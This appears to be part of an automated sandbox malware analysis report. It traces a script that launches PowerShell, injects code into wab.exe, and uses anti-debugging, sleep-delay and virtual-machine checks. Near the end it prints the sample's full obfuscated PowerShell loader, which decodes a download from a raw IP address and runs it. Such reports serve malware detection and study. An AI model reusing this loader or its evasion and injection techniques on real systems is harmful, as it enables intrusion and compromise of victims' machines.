                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 44B833B
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5428Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4455Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7181Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2598Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 9344Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: foregroundWindowGot 1770Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.5 %
                Source: C:\Windows\System32\wscript.exe TID: 7776Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 7181 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 2598 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7852Thread sleep count: 242 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7852Thread sleep time: -121000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7856Thread sleep count: 147 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7856Thread sleep time: -441000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7856Thread sleep count: 9344 > 30Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7856Thread sleep time: -28032000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_20DE10F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE6580 FindFirstFileExA,10_2_20DE6580
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: powershell.exe, 00000005.00000002.1767599813.00000000072AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
                Source: powershell.exe, 00000002.00000002.1895215009.00000258FE4B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdb%SystemRoot%\system32\mswsock.dllxplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfog
                Source: wscript.exe, 00000000.00000002.1375235909.00000291C403F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wscript.exe, 00000000.00000003.1373894931.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\?w0
                Source: wscript.exe, 00000000.00000003.1374264146.00000291C2180000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wscript.exe, 00000000.00000002.1374942655.00000291C2232000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367188832.00000291C21E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367319051.00000291C2211000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373522658.00000291C2232000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: wscript.exe, 00000000.00000003.1367143521.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1366624974.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1374096917.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375072290.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373894931.00000291C3FFE000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2645737177.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2645737177.0000000000888000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: bhvB28E.tmp.11.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_12-34119
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_20DE60E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE4AB4 mov eax, dword ptr fs:[00000030h]10_2_20DE4AB4
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE724E GetProcessHeap,10_2_20DE724E
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_20DE60E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_20DE2639
                Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_20DE2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_20DE2B1C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: amsi64_7836.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7836, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8080, type: MEMORYSTR
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3F20000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3BFF08Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo Viljestrk Taxies Datch Unexplosively Unclipper opsadlede Knox Byguerillaernes Dragen Fyrstehoffernes Psocids Thetarytme Dommerklub Antidoted Bacteroides47 Foerstedel Rendzina Definitionsmngderne244 Forngterens Tillgsbetalings Siris Reproducerer Skovfogedblerne Credo';If (${host}.CurrentCulture) {$Banderillero++;}Function Mashlin($Corban){$Goosing=$Corban.Length-$Banderillero;$Solubilities180='SUBsTRI';$Solubilities180+='ng';For( $aflvningsmiddels=7;$aflvningsmiddels -lt $Goosing;$aflvningsmiddels+=8){$Viljestrk+=$Corban.$Solubilities180.Invoke( $aflvningsmiddels, $Banderillero);}$Viljestrk;}function Catholicate($Lyncine){ . ($Svinske25) ($Lyncine);}$Sikhens=Mashlin ' RugenbMItalienoKdery,ezBefugteiPh,tololFhovedel.udgerealserund/Koasuta5 Bribeg.Clearhe0Underud Lolansp(kamgavlWMawingriOverfo.n Overp dGnarredoopportuw.ahabeas Preemp Ant nagNEf.erspT Preter Blinde1Utaalmo0Parkeri.Fontina0E rthin; onabso .ortidsWf iktioiG,uppeanNonconc6Aracari4 Abbots;R aensb Trinervx Moni,o6Observ.4 Brepil;Sognefo Cyc,otrH.lautov Lssene:Polyes.1Prkener2 Allahc1jongl,r. Reinco0 Deduct)Gleaned T easurGkautionePoli urc Tpdherk Sukkerocarpopo/Fa litt2Gordyfy0Desilve1 Langpl0Coconsc0Senatus1Parapla0Mercify1 tartb Underb,FOverhrti Religirmodulate Statssf ChieftoBortforxLogfile/ Unclin1Flyttel2Nepotis1Bverr t.Dis ppo0Sammens ';$Sensationer=Mashlin 'SolingkUCell.resSkybrude,nshakerScandal- CentimAp,eoccugParad.ne LimphanEffluent Pla.tp ';$Unclipper=Mashlin ' SkrifthSk.lepat vangsftOverextp Snren :Digebru/ Brugsv/Stenion1sandema0 K mmar3Drikkes.Talioni2Sacr me3General7postco,.V,relag8E,cyoff6elfenbe.Adfrds.2Mijn,ee4Colorif7Semiana/SkrigedDTaksatiaSprogbrg Succ.dustilleveIverensrAgrafedr.ehndige TusindoDeaminatj,nerelyBequotep Atriumi FrownsePushilyrM usehanSarinoseaabentvsNoug,te.CockpitfM,slinglW.istwaakuratel ';$Gesjftigstes=Mashlin '.acemak>Coglori ';$Svinske25=Mashlin ' U,ilisiSundhedeMedmennxPr,stit ';$Bmw='Byguerillaernes';$Anskaffedes = Mashlin 'Isblokke Opht.acMadnesshPryglero Dep le Prevari%H ircapaSuggestpCivilbepFrbaadedGuldfataindm,dstOvergloaFarve.r%Fuldebd\BunddkkRgemmedmePreinven Shi kioIntensiwFo,staanEuroomre.nstrukrA.ylate.Manged S Rds,lsuBuf,erenUdlgger Sterr.t&Barna,t&Usselve WhissleeWrassesc,loweryhInkstonoLi,uori Lys,pritSko are ';Catholicate (Mashlin 'Obs.etr$GasbagggUnpleaslMediat.o ViniesbOutplacaUd ullelPharmac:.aferwohRefu,biaMek.niss.lveaartMe struiSkorstegSvengalhGatedhaeNonfecudkrigsspeSydste.rVariabe=Kontoku(Hallucic Su fitmBlackbudSkresta Undece/VerdenscFarmin, Hordeol$E,rwigsAsnep,ovn Disnums elikatkF,ortenaBahamanfEjerbolf NyligeeChastendSotJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Renowner.Sun && echo t"Jump to behavior
